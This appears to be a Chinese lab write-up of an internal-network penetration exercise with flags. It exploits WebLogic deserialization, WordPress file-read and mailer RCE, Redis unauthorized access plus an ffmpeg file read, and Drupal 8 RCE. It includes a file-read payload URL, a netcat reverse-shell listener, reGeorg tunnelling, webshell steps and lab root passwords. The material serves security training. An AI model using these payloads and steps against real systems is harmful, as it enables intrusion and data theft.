实验描述

操作机的操作系统是kali 进入系统后默认是命令行界面 输入startx命令即可打开图形界面。

所有需要用到的信息和工具都放在了/home/Hack 目录下。

本实验的任务是通过外网的两个主机通过代理渗透到内网的两个主机。在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限。

实验目的

Weblogic的java反序列漏洞应用
Wordpress任意文件读取的漏洞利用
Wordpress命令执行的漏洞利用
WordPress通过自己修改的EXP,getshell
通过代理扫描内网
Redis未授权访问以及对配置文件的理解
Ffmpeg任意文件的读取结合redis的利用
Drupal由于YAML解析器处理不当导致远程代码执行

实验环境

操作系统 IP地址 服务器角色 登录账户密码
Kali Linux 192.168.2.10 操作机 用户名:root;密码:Simplexue123
Centos 7 192.168.2.11 目标机 用户名:root;密码:Simplexue123
Centos 7 192.168.1.10 目标机 用户名:root;密码:Simplexue123
Centos 7 192.168.1.11 目标机 用户名:root;密码:Simplexue123
Centos 7 192.168.2.200 目标机 用户名:root;密码:Simplexue123

任务一 Weblogic反序列化

1
2
整体扫描外部网络,探测暴露在外部的主机信息
利用java反序列化漏洞利用脚本执行系统命令。

实验目的

通过完成本实验任务,要求学生掌握利用java反序列化漏洞利用脚本攻击weblogic服务的技术。掌握weblogic服务的常见端口,启动jar程序的方法和攻击weblogic的流程、方法和技巧,为完成后续企业渗透实验任务奠定坚实的漏洞利用技术基础。

打开kal操作机

访问192.168.2.10:7001

image-20210511164542470

打开home/HACK目录下的工具

image-20210511164750762 image-20210511165117929

输入HOST、端口、以及CMD命令

image-20210511165325031

点击connect并执行

根据提示,找到/home/flag下的flag.txt文件

image-20210511165712024

任务二 Wordpress任意文件读取

任务内容:

1
2
使用wpscan工具扫描wordpress的插件漏洞
主要针对插件WP Hide Security Enhancer存在的任意文件读取漏洞,以此读取到网站主要文件。

image-20210511170357840

利用wpscan扫描wordpress网站,扫描漏洞插件

命令:wpscan –url 192.168.2.11 –enumerate p

image-20210511170541006

发现插件存在漏洞

根据提示直接上payload

http://192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.ph p?action=style-clean&file_path=/wp-config.php

得到flag

image-20210511170853149

任务三 Wordpress命令执行

任务内容:

1
2
利用Burpsuite的repeater模块修改包探测漏洞存在的字段。
执行wordpress mailer命令执行漏洞的利用脚本尝试获取shell。

操作步骤

1
2
3
访问目标网站,在浏览器中配置代理,用Burpsuite拦截请求包
使用Burpsuite的repeater模块探测漏洞字段。
理解wordpress mailer漏洞的原理,执行wp.sh 脚本获取响应 信息

首先找到登陆入口

image-20210511171155980

对firefox及burpsuite设置代理,拦截请求。

image-20210511171245109

image-20210511171408750

image-20210511171428356

利用提供的脚本getshell,获得flag

任务四 改进漏洞利用脚本获得命令执行权限

实验目标

1
2
3
4
5
了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。
熟悉sendmail命令语法。
掌握webshell命令执行漏洞的常规下载执行的利用思路。
掌握在浏览器上配置代理的方法。
掌握利用Burpsuite的repeater模块改包测试的过程。

实验步骤

1
2
3
4
查看漏洞利用脚本wordpress-rce-exploit.sh理解脚本改进的原理。
填写漏洞利用脚本的关键信息如反弹IP,监听端口等。本地监听设置的端口获取反弹的shell。
利用shell上传regeorg的tunnel.php文件,使用regeorg架设代理
通过proxychains设置好regeorg的代理,利用这个代理扫描内网1.0网段
image-20210511180514611

首先查看脚本内容

修改recv_host=”192.168.2.200”

设置监听端口

nc –lvvp 7777

反弹shell

任务五 redis未授权访问+ffmpeg 任意文件读取

任务内容:

1
2
查看网页中的信息可知,是通过ffmpeg处理视频的小应用,只有上传,下载和删除功能,此处存在ffmpeg文件读取漏洞,构造特定的avi视频,经过ffmpeg处理之后的视频就会包含想要的文件内容。利用文件读取漏洞获取redis配置文件内容。
redis数据库服务,允许外连且没有设置密码,可以随意访问,此处存在未授权访问漏洞,正常情况下可以写入文件,但是过程中发现,必要的config命令被替换了。而config命令的替换一定是写在redis的配置文件中的,配置文件的路径又可以在redis中执行info获取到。在以上环境中获取到redis服务器的shell。

image-20210511192133312

任务六 drupal8远程代码执行

1
2
3
使用浏览器挂代理访问内网机器192.168.1.10。
利用drupal8的php反序列化漏洞向目标服务器写入webshell。
使用Cknife连接已经生成的webshell

实验目标

1
2
3
4
5
了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。
熟悉网站webshell的概念,理解上传webshell、获取webshell权限的意义和方法。
掌握webshell工具Cknife的基本使用,特别是设置代理的功能,查看上传文件,命令执行等功能的使用。
掌握在浏览器上配置代理的方法。
掌握利用drupal8的php反序列化漏洞的攻击方法和相关的技术原理。

操作步骤

1
2
3
4
5
使用浏览器结合proxychains用之前的代理访问内网中的drupal8的web应用。
弱口令登录目标网站后台
利用反序列化漏洞执行phpinfo 探测网站信息
利用反序列化漏洞写入webshell,并测试存在
用Cknife设置代理连接webshell获取网站的权限

image-20210511192257809

image-20210511192310808

然后利用exp写入webshell

image-20210511192516771

中国菜刀连接,即可获得flag。